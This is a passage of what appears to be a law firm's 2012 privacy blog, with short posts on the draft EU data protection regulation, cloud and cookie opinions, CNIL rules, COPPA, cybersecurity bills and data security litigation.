However, a large number of public and private sector organisations took a different view, commenting that the proposed Data Protection Regulation would increase the administrative burden because of its overly prescriptive nature and that it lacks balance between individual rights and the legitimate needs of data controllers. Key concerns focused on the ‘right to be forgotten’, the requirement that data breaches be reported within 24 hours where possible and the imposition of large fines for failing to comply with the Regulation.

Some respondents were of the opinion that the Regulation did not go far enough to take into account important technological changes, such as the growth of the internet and the increased use of social networking sites and geo-location data. Some commented that requirements were “overly-ambitious”, used a ‘one size fits all’ approach and failed to understand the needs of certain types of businesses in relation to specific personal data and the flexibility required to provide a range of services to customers. In particular, social media companies and e-commerce businesses argued that the proposed Regulation would have a negative impact on their core business. Another key comment from the private sector related to the complexity of the Regulation which would most likely require specific guidance from outside counsel.

Others suggested that the Regulation poses a threat to cloud computing and its future development. Respondents stated that ideally what they were looking for is a piece of legislation that is compatible with future technological advances, but at the same time protects an individual’s right to data protection.

In the MOJ’s view the European Commission’s impact assessment did not properly quantify the compliance costs imposed on business and potentially over-estimates the benefits of introducing harmonised legislation.

The UK Government’s stated aim is a legal instrument that does not overburden businesses, public sector or otherwise, and that encourages economic growth and innovation while still protecting individuals’ personal data. The UK Government supports the requirement for transparent processing and the requirement to proactively provide additional information to data subjects in response to subject access requests. The UK intends to push for an overhaul of the proposed ‘right to be forgotten’ due to it being impractical, costly and confusing, although it does support the individual right to delete their personal data where it is appropriate. Most importantly, and what is good news for business, is that the UK Government plans to resist any provisions it feels are bureaucratic and burdensome, such as mandatory data protection impact assessments.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue. 

A leaked document appears to show proposed changes to the new draft data protection Regulation made by DAPIX on 22 June 2012 confirming that the document is under review by a number of Working Parties of the EU Council. The document includes the full Regulation with changes marked. The introduction to the document states that the proposed changes relate to Articles 1-10, 80(a) and 83. Furthermore, the introduction notes that Belgium, the Czech Republic, Germany and Slovenia have commented that they would prefer a Directive over a Regulation and that almost all delegations think that the proposed Regulation contains too many cases of delegated acts.

Changes to the draft Regulation suggested by European member states through DAPIX included:

• Deletion of Article 1(3) on the Presidency as the subsection did not make sense in the context of a directly applicable Regulation.
• Definition of ‘personal data’ in Article 4 amended as some countries felt the definition was incompatible with the digitalised age. Some countries felt greater clarity was required with ‘personal data’ being distinguished from ‘information’. Comments also highlight issues with the definition of ‘biometric data’, the deletion of the definition of ‘child’ by the Presidency and the addition of definitions for ‘third party’ and ‘Information Society Service’.
• The extension of ‘processing’ to include historical, statistical and scientific under Article 5.
• The inclusion of additional lawful processing purposes added to cover certain categories of sensitive data and processing necessary under Articles 80 to 85 (journalism, scientific or artistic purposes, vital interests of the data subject and historical, statistical and scientific processing).
• The inclusion of biometric data within the concept of sensitive personal data.
• Redrafting of Article 10 which relates to processing that does not allow identification.
• Addition of Article 80a that says “Member States may determine the conditions for the processing of a national identification number or any other identifier of general application”.
• Drafting added to the safeguards in Article 83 which widens the reasons in relation to processing for historical, statistical and scientific purposes.

The draft Regulation is currently under discussion with a number of parties (including the Article 29 Working Party) within the EU and all amendments made are only DAPIX suggestions and are still subject to further review. Time will tell whether any of the suggestions in this document will be included in the next draft of the Regulation.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The Article 29 Working Party (the “Working Party”) has issued a Working Document intended as a “toolbox” for the use of Binding Corporate Rules (“BCRs”) for Processors aimed at both companies and data protection authorities. This document describes the conditions which must be met and includes a full checklist of requirements. The intention is that this toolbox will build on the Working Party’s previous guidance on BCRs set out in previous Opinions WP153 and WP155.

BCRs are internal rules aimed at helping large multinational companies transfer data between their various geographies through the creation of binding principles, but had been principally aimed at companies that are data controllers. BCRs can be used as an alternative to the Safe Harbor Principles (where there is a transfer to the U.S.) or the Standard Model Clauses adopted by the European Commission. Processor BCRs provide a framework for the international transfer of personal data processed by a company as a data processor that must follow the processing instructions of an external data controller, for example, in third-party outsourcing situations or for the use of cloud computing.

The toolbox sets out a list of minimum requirements, including:

• a general description of both the data processing and geographic scope of the BCRs and a list of those entities adhering to the BCRs;
• a clear duty on all members of the Group and their employees to respect the BCRs;
• an explanation how the rules are binding on each group entity and individual employees;
• a clear duty for each entity to cooperate with data protection authorities (DPAs) and for the primary data processor to cooperate with the controller; and
• a grant of third-party beneficiary rights on data subjects in the event the data controller factually disappears, ceases to exist in law or becomes insolvent.

The BCRs would also be binding on the controller in that they would form part of the agreement between controller and processor, and in addition, processors may be obliged to publish the BCRs on their website.

A key provision of Processor BCRs is the liability it would impose on a processor’s main EU group member, as that company would assume liability for breaches committed by members outside of the EU or by third-party sub-processors and would include confirmation of that company having sufficient assets to shoulder the liability.

Other requirements of the Processor BCRs include confirmation of a training programme in place, an audit programme and a complaint handling process including a network of privacy officers for handling complaints. The Processor BCRs need to specify the relationship between the BCRs and the relevant applicable data protection law and evidence a commitment that each member company will notify the data controller if they cannot comply with designated data protection legislation or their obligations. Upon receiving such notice, the data controller would have a right to suspend data transfer or terminate the contract.

While modifications to Processor BCRs would be permitted, any changes would have to be reported to the group members, the relevant DPA and the controller, and where the modifications affect the processing, the controller would be able to object or terminate the agreement. Only updates to the BCRs or the list of processor members would be exempt from any reapplication.

The toolbox provides some guidance for subprocessing by members and non-member companies, including the subcontracting under the controller/processor agreement of the Processor BCRs, but only with the controller’s prior written consent.

Data controllers would also have obligations in relation to the use of a processor who has agreed to the Processor BCRs, such as informing data subjects of the existence of the Processor BCRs, the existence of processors based outside of the EU and whether any sensitive personal data will be transferred to a third country not providing adequate protection.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by John P. Feldman, Amy S. Mushahwar and Christine Nielsen.

This morning the FTC released a supplemental notice of proposed rulemaking on the Children's Online Privacy Protection Act (COPPA) Rule. This is not a final rule. The notice suggests further modifications to proposed definitions released in the September 2011 Notice of Proposed Rulemaking on the COPPA Rule. Specifically, the FTC now seeks comment on proposed modifications to the definitions of "operator," "personal information," and "website or online service directed to children." This notice must be read in conjunction with the 2011 notice to understand the full scope of the proposed changes. The FTC is seeking comments on these proposals. Comments must be received on or before September 10, 2012. Shortly, we will be providing a detailed analysis of this notice in context with the earlier release.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Frederick Lah.

Earlier this year, Maryland enacted the nation's first law explicitly prohibiting employers from requesting or requiring employees or applicants to disclose their usernames and passwords for their personal social media accounts. Many other states are contemplating similar laws, with Illinois' version likely to become law within the next couple of months.

Please click here to read the full post on our sister blog, AdLaw By Request.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Daniel Kadar.

A new regulation of the CNIL, dated 12 June 2012 and published on 13 July 2012, modifies the ways and means of collecting and processing client/prospect-related data.

1. The regulation, issued as an amendment to the “Simplified Norm No. 48” [http://www.cnil.fr/en-savoir-plus/deliberations/deliberation/delib/184/], broadens the possibility for data controllers to make a simplified notification to the CNIL (in which the data controller barely confirms adherence to the rules of such regulation) rather than using the regular notification process.
   
   In addition to client prospecting activities, the new regulation explicitly mentions audience measurement, quality measurement activities and sweepstakes (with the explicit exception of online gambling). Banking and insurance activities, as well as health or education-related activities, are excluded from the scope of this Simplified Norm.
    
2. The main improvement of this new regulation is to impose differentiated data retention periods depending on the nature of the data to be processed. In that regard, prospecting data related to prospects is now aligned to the data retention period for client prospecting material, and can now be retained three years after their collection, compared to one-year period that previously applied. The regulation adds that the data controller will have the option to renew this retention period for another three years if the explicit consent of the data owner is obtained.
   
   Data evidencing the existence of a right or of a contract can be kept five years after contract termination. Accounting documents can be kept 10 years.
   
   Among other categories, credit card-related data can be retained for a maximum of 13 months after the transaction (15 months for a deferred debit card) as evidence.
   
   The retention period of audience measurement data is six months after their collection. Cookies can be retained during the same period of time.
    
3. The regulation also provides important specification as to the way to handle prospecting activities:
   • The client/prospect must in all cases be informed of the purpose of the collection of his/her data by the data controller and of his/her right of access, modification or opposition with the indication of a valid address in that regard.
   • In addition, any kind of automated prospecting (email, SMS, MMS) is subject to the data owner’s consent. The regulation adds that it is not sufficient to include such provisions in the General Terms of Use / General Conditions. Consent must therefore be explicit and separate.
   • Prospecting with “human intervention” can only be done if the data owner is granted the right to oppose “in a simple manner” such processing.
      
4. Whilst this Simplified Norm allows the transfer of data to non-EU countries provided that the data importer has agreed to guarantee an EU-equivalent level of data protection (through Safe Harbor membership,where applicable), the subscription of a data transfer agreement including the EU-model clauses or by implementing binding corporate rules (BCRs), it shall not apply to any data processing “likely to exclude a data owner from the benefit of a right or from a contract or service.” In such case, the CNIL will require an authorization procedure.
    
5. This new regulation, which amends the “Simplified Norm No. 48,” will force a number of data controllers to adapt their internal procedures, in particular as to data retention periods. The CNIL has therefore imposed a transition period of 12 months from the date of publication of the new regulation (i.e. until 13 July 2013).

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Amy Koch, Amy Mushahwar and Christine Nielsen.

The Federal Energy Regulatory Commission (FERC) issued an order on July 20, 2012 to investigate whether any Authorized Certification Authorities (ACAs) had violated the North American Energy Standards Board (NAESB) Public Key Infrastructure (PKI) Standards, which outline various security requirements and specifications for the electric grid.¹  The Order requires all ACAs (there are currently four) to submit a report to the Commission by July 27 which explains the processes and procedures each ACA uses to validate the identity of individuals requesting digital certificates, and the key lifetimes used for various certificates. There has been great debate about the appropriate lifespan of a digital certificate which would balance the cyber security needs of the grid with the amount of disruption imposed on businesses. In response to these concerns, Senator Joseph Lieberman (I-CT) submitted The Cybersecurity Act of 2012, a compromise bill with bipartisan sponsorship and the support of President Obama. On July 25, Senate Majority Leader Harry Reid (D-NV) invoked cloture to schedule a floor vote on the Cybersecurity Act prior to the Senate’s August recess, which will determine whether the Act will eventually be negotiated in a Conference Committee with members of the House of Representatives and could ultimately lead to a passed bill out of both of the Houses. Any new cyber security legislation which Congress passes could have a profound effect on the way the electric grid and other public-private critical infrastructure is secured. Please click here to read the issued Client Alert.

^{___________________________________}

¹ Reporting on North American Energy Standards Board Public Key Infrastructure Standards, 140 FERC (2012). 

Research and drafting assistance for this post was provided by Reed Smith Legal Intern Rachael E. Pashkevich.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Paul Bond and Frederick Lah.

We previously reported on Texas House Bill 300 that was signed into law last year.  The new law presents stricter requirements for health privacy and data breach notification obligations.  That law is set to become effective September 1, 2012.  Two types of entities will be primarily affected by the law: "Covered entities" – as that term is defined under the Texas law – will need to comply with the health privacy requirements.  For the breach notification amendment, any person who "conducts business" in Texas and owns or licenses computerized sensitive personal information about "individuals" (not limited to just Texas residents) must comply with the law.  For our previous Client Alert on H.B. 300, please click here. 

Connecticut is another state that has recently enacted its data breach notification law.  Connecticut House Bill 6001 now requires that notification be provided to the attorney general any time notification is required to be given to a resident, at a time "not later than the time when notice is provided to the resident."  This change is set to become effective October 1, 2012.

These two upcoming changes follow a busy year in state privacy law amendments.  Illinois, California, and Vermont have all amended their data breach notification laws within the past year.  We previously covered the Vermont amendments here.  Each of these data breach notification laws is currently effective.  Also earlier this year, while not an amendment, the grandfather provision under the Massachusetts Regulations with respect to non-compliance for service provider contracts expired.  Now, all companies subject to the Regulation must ensure that their contracts with service providers contain a provision to implement and maintain appropriate safeguards.  We covered this specific provision here. 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Amy Koch, Amy Mushahwar and Christine Nielsen.

Since three cyber security bills passed the House in April (H.R.2096, H.R.3523, and H.R.3834), all eyes have been on Washington for cyber security developments in the Senate. This past week there were several. The week began with a hearing on Tuesday, July 17, by the U.S. Senate Committee on Energy and Natural Resources “to examine the status of action taken to ensure that the electric grid is protected from cyber attacks,” inviting witnesses from the Federal Energy Regulatory Commission (FERC), the Government Accountability Office (GAO), North American Electric Reliability Corporation (NERC), and the Public Utilities Commission of Ohio. On Thursday morning, an editorial from President Obama appeared in the Wall Street Journal urging the Senate to pass a cyber security compromise bill. Then, late on Thursday, Sen. Lieberman released the text of a compromise proposal. Please click here to read the issued Client Alert.

Research and drafting assistance for this post was provided by Reed Smith Legal Intern Rachael E. Pashkevich.

 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The Article 29 Working Party, which is made up of each of the EU member states’ national data protection authorities, issued an Opinion on cloud computing earlier this month. The Working Party acknowledges that for certain businesses, cloud computing has been an important technological revolution and a key area of development for their technology and computing strategy. The Working Party supports the development of cloud computing and its ability to generate economic benefits to businesses and organisations, given the wide range of cloud services on offer and business demand. The Working Party supports the idea of a European Cloud Partnership strategy in favour of public sector procurement of cloud services, so long as special precautions are taken, especially if it simulates development of the European cloud market.

Please click here to read the issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The Article 29 Working Party (the “Working Party”) issued an Opinion on cloud computing that analyses the applicable law, obligations and other relevant issues for cloud service providers operating in the European Economic Area (“EEA”). The Opinion outlines how the wide-scale deployment of cloud computing services could trigger a number of data protection concerns.

The Article 29 Working Party Opinion discusses two main risks. The first relates to the lack of control by the data controller over the personal data processed in a cloud system, which may result in that controller no longer having exclusive control of the data. The second relates to a lack of transparency if the data controller receives insufficient information about the cloud provider’s processing operations. Without adequate information, a data controller may not be aware of the potential threats or risks to the personal data, especially if there is a chain of sub-processing or transfers outside the EEA. This would leave the data controller in a situation where it may be unable to take appropriate action.

The Opinion identifies the Data Protection Directive 95/46/EC as the relevant legal framework for cloud computing, with the legislation of the country in which the data controller is established, rather than the place in which the cloud computing providers are located, being the applicable legislation. If the controller is located outside the EEA, but the cloud provider is located in the EEA, then the provider exports the data protection legislation to the client. The Working Party also confirms that the customer of the cloud services is typically the data controller, with the cloud provider being the data processor.

The Working Party lists a number of data protection requirements that must govern the relationship between the cloud customer (or data controller) and the cloud provider. These are divided into three key areas:

• Compliance with basic principles such as specific purpose, transparency and erasure of data
• Safeguards put in place in contract for cloud computing services
• Responsibility of the data controller to choose a cloud provider that will implement adequate technical and organisational security measures to protect personal data put in the cloud

Finally, the Opinion closes with recommendations aimed at data controllers seeking to put personal data in the cloud, such as conducting a comprehensive and thorough risk analysis which is underpinned by the cloud provider supplying all necessary information for a data controller to assess the pros and cons of using the cloud.

We will be issuing a detailed Client Alert on this important subject.

• Print
• Comments (1)
• Trackbacks
• Share Link

This post was written by Mark S. Melodia, Paul Bond, and Frederick Lah.

The concept of "reasonableness" is found throughout the law and tends to develop slowly through the common law in a variety of geographies and commercial contexts. This uneven and unpredictable development of case-by-case rulings ultimately provides resilient standards, but at a great interim cost of uncertainty and litigation.

The First Circuit appears to have attempted to take a step toward defining what "reasonableness" means in the data security context. The court recently held that a local Maine bank failed to establish "commercially reasonable" security measures, as defined by the UCC, to prevent numerous fraudulent transactions from an account held by one of its commercial customers. Financial institutions (or any type of company for that matter) face myriad cyber threats pertaining to data security, ranging from malware to phishing schemes to data breaches. Falling prey to one of these threats can later lead to litigation, and quite often, the issue then becomes what kind of measures the company had in place to prevent such threats from being realized. The "reasonableness" of the company's data security measures can serve as an important defense.

In this case, Ocean Bank authorized six apparently fraudulent withdrawals totaling $588,851.26 over the span of seven days, from an account held by Patco Construction Company, after the perpetrators were able to supply Patco's answers to their challenge questions. Ocean Bank was able to recover some of the money but Patco still suffered a residual loss of approximately $345,000. These transactions were processed, without notification to Patco, even though Ocean Bank's security system flagged these transactions as "high-risk" because of their timing, high value, and geographic locations. In addition, Ocean Bank lowered the dollar amount threshold above which a transaction would automatically trigger the challenge questions from $100,000 to $1. This meant that essentially every time Patco initiated a transaction, it would be required to answer the challenge questions. Cyber criminals equipped with keylogging capability therefore had more frequent opportunities to capture all information necessary to compromise an account. This, combined with the fact that Ocean Bank had the capacity to monitor and notify customers about suspicious activity but didn't do so, led the court to hold that its security system was commercially unreasonable. It should be noted that the court's finding was one of "unreasonableness" with respect to this specific set of facts, and that the court did not attempt to expressly set forth what measures would need to be in place to be considered "reasonable."

The apparently favorable ruling for plaintiff's attorneys raises the question of what exactly is a "commercially reasonable" security standard. In some way, the holding seems to suggest that banks should implement stronger security measures, especially if they have had recurring issues with data security. As for the use of challenge questions as a backstop, the court also placed emphasis on the fact that Ocean Bank's security vendor previously cautioned that challenge questions are quicker and simpler to adopt, but are less secure. On the other hand, no security system can ever be completely secure, so it's important for banks to objectively and realistically assess the entirety of their security systems to make sure they are prioritizing their efforts on the areas that pose the biggest security risks. Banks should combine both employee-driven policies and technology-based solutions for the most effective data security programs. What's additionally important to note here is the First Circuit's suggestion that customers also have "obligations and responsibilities" under the UCC. The court cited other sections from the UCC where a customer has a "duty of ordinary care," but stopped short of setting forth any similar standard here, stating that, "[i]t is unclear, however, what, if any, obligations a commercial customer has when a bank's security system is found to be commercially unreasonable." The court left that question to be briefed on remand.

This case demonstrates that our courts are still in the early jurisprudential stages of developing a body of law around what is "reasonable" in the data security context.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Amy S. Mushahwar 

On July 11, the National Institute of Standards and Technology (“NIST”) released Guidelines for Managing and Securing Mobile Devices in The Enterprise, its draft policy for securing mobile devices that will supplement its already-published general security recommendations for any IT technology. In these draft Guidelines, which are a revision of its 2008 publication Guidelines on Cell Phone and PDA Security, the NIST is updating its mobile security recommendations and focusing on new technologies, specifically smartphones and tablets. Once published, this could become the approved guidelines for all federal agencies and federal contractors, which could be particularly troublesome for those lacking mobile device security policies and other security measures.

Focused on providing cost-effective security guidelines, the NIST recommended centralized mobile device management technologies for both organization-owned and personally-owned (BYOD) devices, which manage the configuration and security of mobile devices while allowing other security features to be added as needed. Additionally, the NIST recommended: (1) developing system threat models for mobile devices and the resources that are accessed through the mobile devices; (2) instituting a mobile device security policy; (3) implementing and testing a prototype of the mobile device solution before putting it into production; (4) securing each organization-issued mobile device before allowing a user to access it; and (5) maintaining mobile device security regularly.

Please click here to read the entire set of Guidelines. The NIST is accepting comments concerning the draft Guidelines until August 14.

 

Research and drafting assistance for this post was provided by Reed Smith Legal Intern Rachael E. Pashkevich.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Timothy P. Law.

This week, Wisconsin became the latest state to join the majority of courts nationwide finding broad general liability insurance coverage for claims alleging violations of the Telephone Consumer Protection Act, ruling that such claims allege publication of material that violates a person’s right of privacy.

Please click here to read the full post on our sister blog, The Policyholder Perspective.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Daniel Kadar.

“The CNIL is ready for combat” - this is how Mrs. Falque-Pierrotin, President of the CNIL, described its mission after taking office last year.

Introducing a 100-page-long yearly “Activity Report” dated 10 July 2012, fully translated into English, the President of the CNIL outlined what is to be seen as the main action principle of the CNIL for years to come -“enforcement and oversight” of data protection compliance, rather than simply monitoring it.

As our blog has highlighted, the CNIL over the past months has taken several actions, demonstrating its growing position as a powerful regulatory authority:

• It has issued new regulation principles with regard to data security and cookies, and conducted a broad consultation that led to the partly binding “recommendations” on cloud computing issued two weeks ago.
• It increased its power of sanction. Google has been fined €100,000 for its Google Street application, and is also under scrutiny by the CNIL because of its new integrated platform which allows “intelligent advertising”. Facebook is also under the CNIL’s watch.
• It is also a front-runner in challenging the projected new data protection regulation with regard to the issue of jurisdiction and the broadening of exemptions. Under the new regulation, the European Data Protection Authority of the country in which a data controller has its ‘main establishment’, would have sole jurisdiction to rule on complaints against such a data controller, which would reduce the CNIL’s power to control proceedings.

2011 showed a 19 percent increase in the complaints directed to the CNIL by the public (5,738), and 385 controls were implemented (an increase of 25 percent in relation to 2010).

Interestingly, the complaints linked to the “right to be forgotten” were up 42 percent versus the previous year (1,000 complaints), and complaints linked to HR data processing represented 12 percent of the total volume of complaints. Complaints linked to the so-called “cyber-surveillance” tools (monitoring the use of electronic communications by employees) were up 59 percent compared with the previous year. Complaints linked to HR-data breaches were up 27 percent.

The CNIL issued 65 formal notifications, 13 warnings (which are to be considered as sanctions), and five financial penalties, with the largest penalty being €100,000.

The CNIL’s increased activity over the past year and in the first semester of 2012 suggests that last year’s numbers will be exceeded in 2012.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

During its meeting in early June, the Article 29 Working Party (the “Working Party”) issued an Opinion on cookies that analyses the exemptions to the requirement for informed consent, and sets how the revised e-Privacy Directive impacts cookie usage.

Article 5.3 of the amended ePrivacy Directive 2009/136/EC provides that cookies are exempt from the need to obtain informed consent when a cookie is:

A. used “for the sole purpose of carrying out the transmission of a communication over an electronic communications network” or

B. “strictly necessary in order for the provider of an information society service explicitly requested by the subscriber or user to provide the service”.

The Working Party opined that the restrictive nature of “sole purpose” in A specifically limits this exemption such that the use of cookies that assist, speed up or regulate transmission of a communication fall outside the informed consent exemption.

To satisfy B above, a cookie has to pass two tests to be exempt:

• The user must take a positive action to request a service with a clearly defined perimeter
• The cookie is required such that if the cookie was disabled, the requested service would not work

The Working Party pointed out that cookies exempt from consent should have a lifespan related to their purpose and must expire once no longer needed, taking into account the reasonable expectations of the average user.

“Third party” cookies are more likely to require consent where they are not strictly necessary, as the data protection risk comes from the purpose(s) for the processing, rather than from the information contained within the cookie.

• Where cookies perform multiple functions, they will only be exempt from the consent requirement if all of the distinct purposes individually satisfy the exemption criteria. The Opinion sets out several helpful examples of situations where cookies will or will not be exempt from the consent requirement by specifically discussing “user-input” cookies, authentication cookies, user-centric security cookies, multimedia player cookies and load balancing cookies, user interface customisation cookies, and social plug-in content sharing cookies.
• Cookies which the Working Party considered to be outside the exemption from consent included social plug-in tracking cookies, third-party cookies used for behavioural advertising, and first-party analytic cookies, even though the Working Party recognized that such cookies represent a low privacy risk where they are limited aggregated statistical data, and where the website operator provides clear information about cookies and adequate privacy safeguards, such as an opt-out from data collection and anonymisation.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by John P. Feldman and Frederick Lah.

In early June, New Jersey Attorney General Jeffrey Chiesa and the New Jersey Division of Consumer Affairs brought a complaint against California-based mobile app developer 24x7 Digital LLC for alleged violations of the Children's Online Privacy Protection Act ("COPPA"). The state alleged that 24x7 Digital, through its "TeachMe" Apps, was collecting the names and unique device identifiers ("UDIDs") of children and transmitting them to a third party, without the COPPA-required notice or parental consent.

Just three weeks later, the two sides have settled. As part of the settlement, 24x7 Digital represented that it will destroy all of the information collected in violation of COPPA and that it has stopped collecting such information. The developer also agreed to comply with monitoring and reporting requirements. No money appears to be a part of the settlement. The attorney general hailed the settlement as a "clear victory for children's privacy in the age of mobile devices and the easy transfer of personal information."

According to a press release, this lawsuit was the first filed as a result of the state's ongoing initiative against Internet privacy and acts of cyberfraud. The state hinted that more suits may be on the way, saying that the Division is continuing to investigate other mobile applications and their possible unlawful sharing of personal information.

Notable is the speed with which this lawsuit was settled, as well as the absence of any money attached to this order. Cooperation and quick action may have paid off for 24x7 Digital.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Daniel Kadar.

On 25 June 2012, the CNIL published on its website a summary article and a 10 page conclusion paper, along with a 21-page “recommendations” document, which constitute the French Data Protection Authority’s new guidance in that regard.

Aimed to target small- to medium-sized companies considering using cloud computing services, and aimed at helping them make more informed decisions regarding such services, these “recommendations” are in fact seven principles applicable to all cloud computing service agreements, to which the CNIL connects five “essential elements that have to be part to a Cloud computing services agreement”. In addition, the CNIL provides a 10-page document of “model clauses” aimed to implement the aforementioned “essential recommendations”.

Another essential point that the CNIL outlines in its guidance is that, in its view, the cloud computing service provider can hardly escape the legal qualification of data controller, since the presumption that the cloud computing service provider is a simple data processor can easily be reversed in its view.

This new guidance shows the CNIL’s will to impose in the short-term, new contractual standards.

For a more detailed analysis, please click here to read the issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The International Working Group on Data Protection in Telecommunications (“the Working Group”) released a working paper on privacy and data protection issues surrounding cloud computing, specifically examining the processing of personal data. The paper recognises the growing popularity of cloud computing; however, the Working Group advises that caution should be taken because of the fact that cloud computing is still relatively new. The paper sets out a number of recommendations on how to minimise the risk of data loss, and how certain precautions should be taken in cloud computing environments.

The National Institute of Standards and Technology defines ‘cloud computing’ in its Special Publication 800-145, which the Working Group describes as “an excellent starting point for the further investigation” of cloud computing and how it can be used. However, there is still a level of uncertainty around cloud computing, in particular in relation to privacy and data protection issues; and the evolution of cloud computing has raised a number of important issues which are discussed in the paper, including the fact that:

• The technology is still in progress
• The technology is boundless and trans-boundary
• Data processing has become global as a result of cloud computing
• There is a general lack of transparency around cloud service providers

As a result, these issues may lead to an increased risk of breaches of:

• Information security going unnoticed by a data controller
• Data being transferred to jurisdictions that do not have adequate data protections in place
• A data controller losing control of the data

The Working Group makes a number of recommendations on the subject of the relationship between data protection and cloud computing, including that:

• Cloud computing must not lead to a lowering of data protection standards
• Data controllers should carry out privacy impact and risk assessments (as necessary) before embarking on cloud computing projects
• Data protection regulatory authorities (DPAs) should continue to provide information on the privacy and data protection issues affecting cloud computing

In addition to the recommendations, the Working Group lists 27 guidance points on best practice, and an additional 17 points on the background to the recommendations.

On best practice guidance, the key points include:

• Cloud computing implementation should take place in measured steps, starting with non-sensitive and non-confidential information
• Processing sensitive data via cloud computing raises additional concerns and therefore requires additional safeguards
• Location audit trails should be automatically made available to data controllers and DPAs
• Effective technical measures should be developed to prevent personal data from being transferred illegally to jurisdictions without adequate data protection
• Personal data at rest and in transit should be encrypted. Encryption keys should not be available to anyone other than the data controller and cloud service provider.

For the full list of guidance points and recommendations, the Working Group paper can be found here. 

 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Paul Bond and Christine E. Nielsen.

The state attorneys general, led by Maryland Attorney General Doug F. Gansler, are gearing up for a year focused on privacy and the Internet. On June 21, AG Gansler was installed as the 2012-13 president of the National Association of Attorneys General (NAAG). As the NAAG President, AG Gansler announced that he will spearhead a national initiative examining privacy and the Internet, the Presidential Initiative for the coming year. To kick-start that initiative, “Privacy in a Digital Age,” privacy panel discussions during the NAAG summer meeting focused on privacy in online gaming and the theft of children’s Social Security numbers. Although it is impossible to predict what specific topics the attorneys general will focus on as part of the Presidential Initiative, educated guesses can be made by reviewing recent attorney general privacy and data security actions, as well as looking at what is on the radar for federal regulators. Our predictions for the top three issues: (1) children, (2) mobile, and (3) privacy policies.

New Jersey Attorney General Jeffrey S. Chiesa set the stage for AG enforcement action against mobile application (app) developers with his lawsuit against app developer 24 x 7 Digital, LLC. On June 4, New Jersey sued 24 x 7 for collecting and transmitting the names and unique device identifiers (UDIDs) from children without parental consent in violation of the Children’s Online Privacy Protection Act (COPPA). Although most state AGs have not been particularly active in COPPA enforcement, this case is an important reminder that they have that authority, and may be flexing their muscle in this area in the months to come.

California Attorney General Kamala D. Harris also recently took a closer look at the fact that many mobile app developers do not disclose their data collection practices to app users, and entered into agreements with six leading mobile app platform providers to require developers to create, implement and maintain privacy policies. We wrote about that agreement here. Facebook has also just signed a similar agreement with AG Harris for its new App Center. Thirty-seven state attorneys general, led by AG Gansler and AG Rob McKenna of Washington, sent a letter to Google in February of this year outlining their concerns with Google’s changing privacy policy. The attorneys general have long argued that companies should mean what they say in their privacy policies, and should not make unilateral changes that harm consumers. As the 2012-13 Presidential Initiative gets underway, it is a safe bet the attorneys general will continue to scrutinize disclosures made in privacy policies, especially in those related to products and services available in the mobile space.

It is not a surprise that these areas should be receiving special attention by the states, as mobile apps, children’s issues and disclosures in privacy policies have been front and center for federal agencies looking at privacy issues. We have discussed the Federal Trade Commission’s most recent reports on privacy here and the Department of Commerce’s report here. One recommendation from Commerce’s report – the convening of stakeholder meetings to develop privacy codes of conduct – is already being implemented. Stakeholders interested in the transparency of data collection by mobile applications will converge on Washington, D.C. July 12 to discuss the topic at length. The National Telecommunications and Information Administration’s (NTIA) blog announcing that mobile will be the first topic is available here. FTC Commissioner Julie Brill also reiterated the FTC’s top three privacy issues – data brokers, mobile, and privacy policies for social networks – at the annual privacy and data security Practising Law Institute conference in New York.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Amy S. Mushahwar.

Reed Smith is actively monitoring the changing top-level domain name environment that has large implications for Internet security, stability and navigability. On June 13, the Internet Corporation for Assigned Names and Numbers (ICANN) released the list of the domain names applied for, with more than 1930 applications for top-level domains (the language to the left of the dot in an Internet address, such as .com in reedsmith.com). If even one-half of these applied-for top-level domains are delegated into the Internet root, we could see the domain name space increase more than 4300 percent over the 22 generic top-level domains that are in place today. Such a vast domain expansion will only increase the number of places for felons and other nefarious characters to hide online. Reed Smith will continue to monitor such developments and will have an attorney at ICANN's Prague meeting to report on developments.

For further information, please click here to read our recently issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Christopher G. Cwalina, Paul Bond, and Christine E. Nielsen.

A recent decision in ongoing litigation over mobile application practices shows how difficult the defense of privacy class actions can be. Even if the defense wins dismissal of some causes of action, the survival of any cause of action may force the defendant into costly discovery.

On June 12, U.S. District Judge Lucy Koh granted in part and dismissed in part Motions to Dismiss filed in the iPhone Application Litigation MDL in the Northern District of California, case no. 5:11-md-02250. In this case, plaintiffs claimed defendants violated plaintiffs’ privacy rights by unlawfully allowing third-party applications to collect and use personal information, including location information, from users’ mobile devices without consent. Plaintiffs brought 13 causes of action against Apple and the Mobile Industry defendants, including those based on federal statute, state statute, contract law, tort, and equity.

Defendants contended that plaintiffs lacked Article III standing and the case should be dismissed for lack of subject matter jurisdiction. They argued that plaintiffs failed to allege actual injury-in-fact. Judge Koh disagreed, noting that “Plaintiffs have alleged actual injury, including: diminished and consumed iDevice [iPhone, iPad, and iPod Touch] resources, such as storage, battery life and bandwidth; increased, unexpected, and unreasonable risk to the security of sensitive personal information; and detrimental reliance on Apple’s representations regarding the privacy protection afforded to users of iDevice apps.” The court found that plaintiffs’ alleged overpayment for those devices was enough to establish standing under California’s Unfair Competition Law (UCL). The court then found that the alleged business practices may be unlawful under California’s Consumer Legal Remedies Act (CLRA), unfair in that they are injurious to consumers and may not be outweighed by benefits to consumers, and fraudulent in that Apple made misrepresentations and material omissions to induce the purchase of mobile devices.

